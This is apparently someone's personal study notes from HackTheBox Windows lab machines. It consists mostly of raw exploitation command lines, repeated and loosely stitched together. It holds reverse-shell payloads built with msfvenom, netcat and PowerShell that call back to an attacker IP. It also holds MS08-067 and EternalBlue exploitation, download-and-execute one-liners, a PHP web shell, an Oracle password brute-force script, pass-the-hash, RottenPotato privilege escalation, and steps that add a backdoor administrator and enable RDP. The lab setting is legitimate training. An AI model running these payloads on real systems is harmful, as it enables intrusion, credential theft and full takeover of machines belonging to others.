My Practice on HTB Windows boxes
Windows
htb
One method:
nmap -sT -p- --min-rate 10000 -oA nmap/alltcp 10.10.10.4
SMB smbmap -H 10.10.10.4 nmap vuln scanner for smb nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
smb-vuln-ms08-067: vulnerable
SMB exploits, MS-08-067 (made famous by Conficker) and MS-17-010 (made famous by Shadow Brokers).
for changing the shellcode msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
python ms08-067.py 10.10.10.4 6 445
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe
transfer whoami.exe binary from kali to windows xp
smbserver.py a /usr/share/windows-binaries/
C:\WINDOWS\system32>\10.10.14.14\a\whoami.exe
==========================================================
nmap nmap -A -vv --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010 -p445 10.10.10.40
services open smb
smbmap -u guest -H ip
its vulnerable to eternal blue vulnerability cve-2017-0143
Using the windows/smb/ms17_101_eternalblue module in Metasploit, we can successfully get a shell as nt authority!
​https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py - mysmb script put on the same folder
vi /etc/hosts smbclient -L \10.10.10.40 -N smbclient \\haris-pc\Users
smbclient -L \haris-pc -N - smbscan smb verification- smbclient \\haris-pc\Users
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=port -f exe > blue.exe
exploit modifiation - username - guest and changes the exploit
smb_send file exploit
smbfile smbexec
python exploit.py ip ntsvcs - boom
more root.txt
further exploitation - enable rdp and add a user
net user hacker hacker /add net localgroup /add administrators hacker
enabling rdp reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
3389 enabled
=============================================
htb windows
nmap -sT -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.5
found ftp open 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png
server is running on asp.net. we can upload asp shell and get the reverse connection
locate cmd.aspx usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx
put cmd.aspx then visit cmd.aspx
web to shell- 3 ways (nc.exe, nishang, meterpreter)
create a smb server on attackeer machine and upload nc.exe on the server
locate nc.exe cp /usr/share/windows-binaries/nc.exe smb/
run this command on attacker machine smbserver.py share smb
create a listener on the attacker machine
\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443 - in webshell run this command
nishang exploit
Invoke-PowershellTcp copy this file from /opt/nishang/shells to /smb directory
this line put in to end of the file Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
This will make it so that not only does the module load, but then the shell is called to give me a callback.
run this commmand on the webshell then it get from attacker python server and then give shell to attacker machine powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx
put met_rev_443.aspx
then run listener on metasploit and get the system shell by clicking aspx shell
Enumeration part systeminfo
WATSON to check potential vulnerabilities
For checking .net version: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
\10.10.14.14\share\Watson.exe
\10.10.14.14\share\MS11-046.exe
done boom
MS10-015
Run local exploit suggester : use post/multi/recon/local_exploit_suggester
I’ll give exploit/windows/local/ms10_015_kitrap0d a run.
==============================================================================
nmap -sC -sV -oA optimum 10.10.10.8 https://old.exploit-db.com/exploits/39161/ https://www.exploit-db.com/exploits/39161​
script value change (add ip and port)
cp /usr/share/windows-binaries/nc.exe /opt/HTB/optimum
copy window binary from kali to windows with exploit
we got user shell
now turn to root shell windows-exploit-suggester.py
python windows-exploit-suggester.py –update
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls
we use powershell empire for exploit ms16-032 Under PowerShell/Empire, there is a separate ps1 file for MS16-032. We will save it as Empire.ps1.
Invoke-MS16032 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://10.10.14.2/shell.ps1‘)â€â€‹
searchsploit hfs 2.3
rce on the system copy nc in to specific folder and exploit through python script
after got user access then turn in to window exploit suggester
python window exploitsuggester.py --database .xls --systeminfo .txt
While this tool gave us some great suggestions, i found an easier exploit while looking around on Google.
ms16-098
==================================================================
nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.9
I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.
run droopescan for finding potential loopholes
Shell as iusr
searchsploit -m exploits/php/webapps/41564.php
$file = [ 'filename' => '0xdf.php', 'data' => '<?php system($_REQUEST["cmd"]); ?>' ];
apt install php-curl
hashcat -m 7900 admin.hash /usr/share/wordlists/rockyou.txt -o admin.cracked --force
Ruby Script However, on reading about Drupalgeddon2, it seems this is testing the vulnerability on a Drupal 8 specific path.
I’ll try the ruby script, searchsploit -m exploits/php/webapps/44449.rb. Now I’ll run it, and it returns the help, and a warning:
Settings - Proxy information (nil to disable)
proxy_addr = '127.0.0.1' proxy_port = 8080
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
2nd method through nishang
python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"
with smbserver transfer this \10.10.14.14\share\ms15-051x64.exe "whoami"
\10.10.14.14\share\ms15-051x64.exe "\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"
======================================================
nmap -sC -sV -oA nmap/initial 10.10.10.82
odat sidguesser -s 10.10.10.82
guess bruteforce user and password
sqlplus SCOTT/[email protected]:1521/XE
sqlplus SCOTT/[email protected]:1521/XE as sysdba
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')
type "\users\Phineas\Desktop\Oracle issue.txt"
Memdump
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
volatility kdbgscan -f SILO-20180105-221806.dmp
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 [email protected]
Oracle Execution
tasklist /v
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt
Shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
upload the file odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe
run the file odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe
If we check whoami /priv, we’ll see SeImpersonatePrivilege:
whoami /priv
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat') PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
=======================================
Notice that port 80 - Microsoft IIS httpd 8.5 is opened. Just note it down, it will be useful later on. Let’s focus on port 1521 (and sort of port 49160) instead - Oracle TNS listener 11.2.0.2.0 (unauthorized). Doing some enumeration I find out that this particular version of Oracle listener is vulnerable to remote TNS poisoning.
sqlplus scott/[email protected](DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=10.10.10.82)(Port=1521))(CONNECT_DATA=(SID=XE))) AS SYSDBA CREATE USER v3ded IDENTIFIED BY v3ded99; GRANT dba TO v3ded;
ODAT python odat.py all -s 10.10.10.82 -d XE -U v3ded -P v3ded99
[2.10] DBMS_XSLPROCESSOR library ? is enabled
DBMS_XSLPROCESSOR library is enabled and therefore allows us to put any files onto the machine. Here is the command that will do so:
python odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U v3ded -P v3ded99 --putFile "c:\Windows\" "v3ded.txt" "/tmp/v3ded.txt"
now create the shell msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.193 LPORT=443 -f aspx > /tmp/v3dedShell.aspx
python odat.py dbmsxslprocessor -s ip -d XE -U v3dwd -P pass --putfile "C:\inetpub\wwwroot\" "v3dedshell.aspx" "/tmp/v3dedshell.aspx"
after getting shell Navigating to his Desktop directory I see an interesting file called “Oracle issues.txtâ€.
Using Volatility to extract passwords
​https://github.com/volatilityfoundation/volatility python vol.py -f SILO-20180105-221806.dmp imageinfo
python vol.py -f ../SILO-2018.dmp --profile=Win8SP1x64 hivelist
python vol.py -f SILO-20180105-221806.dmp --profile=Win8SP1x64_18340 hivelist
==========================================
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
we create a new file name is 1.bat and the content is
dir /a c:\users\
./odat.py
./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" 1.bat /root/Desktop/1.bat --sysdba
./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" 1.bat --sysdba
=================================================
nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.82
gobuster -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html -t 30 - for dir hunting
Oracle db - Port 1521 - port open we need odat tool setup now find sid 1 - Identify SIDs
odat sidguesser -s 10.10.10.82 - sidguesser
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc' So at this point we have four potential SIDs: ‘XE’, ‘XEXDB’, ‘PLSExtProc’, and ‘CLRExtProc’.
3 - Guess / bruteforce user and pass
So I wrote a brute force script in python, using threads, can go pretty quick:
!/usr/bin/env python
import cx_Oracle import sys from multiprocessing import Pool
MAX_PROC = 50 host = "10.10.10.82" sid = "XE"
def usage(): print("{} [ip] [wordlist]".format(sys.argv[0])) print(" wordlist should be of the format [username]:[password]") sys.exit(1)
def scan(userpass): u, p = userpass.split(':')[:2] try: conn = cxOracle.connect('{user}/{pass}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid)) return u, p, True except cx_Oracle.DatabaseError: return u, p, False
def main(host, userpassfile, nprocs=MAX_PROC): with open(userpassfile, 'r') as f: userpass = f.read().rstrip().replace('\r','').split('\n')
pool = Pool(processes=nprocs)
​
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
if status:
print("Found {} / {}\n\n".format(username, pass_))
else:
sys.stdout.write("\r {}/{} ".format(username, pass_))
if name == 'main': if len(sys.argv) != 3: usage() main(sys.argv[1], sys.argv[2])
4 - Check out the database sqlplus SCOTT/[email protected]:1521/XE
5 - db PrivEsc
select * from user_role_privs; sqlplus SCOTT/[email protected]:1521/XE as sysdba Similarly with odat, running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx
cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 .
Use SimpleHTTPServer to offer it, and then issue the following to the webshell: powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:8083/Invoke-PowerShellTcp.ps1')
user.txt
type "\users\Phineas\Desktop\Oracle issue.txt"
we got memory dump Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0​
link password: ?%Hm8646uC$
we need memory dump for this file and get data systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600
volatility kdbgscan -f SILO-20180105-221806.dmp Profile suggestion (KDBGHeader): Win2012R2x64_18340
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist 0xffffc00000028000 0xffffc00000619000
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
try passthehash /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82
Oracle Execution tasklist /v
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\users\administrator\desktop\root.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
Now upload it:
odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \temp shell.exe shell.exe
And run it:
odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \temp shell.exe
SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
This means that we can likely use RottenPotato (or LonelyPotato).
First, we’ll upload two files to the server. MSFRottenPotato.exe and rev.bat. The exe is from Decoder’s GitHub page for lonelypotato. The second is a simple powershell command to get a shell:
rev.bat powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
So, from our low priv shell, grab the files:
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat') PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
run this file c:\temp\lp.exe * \temp\rev.bat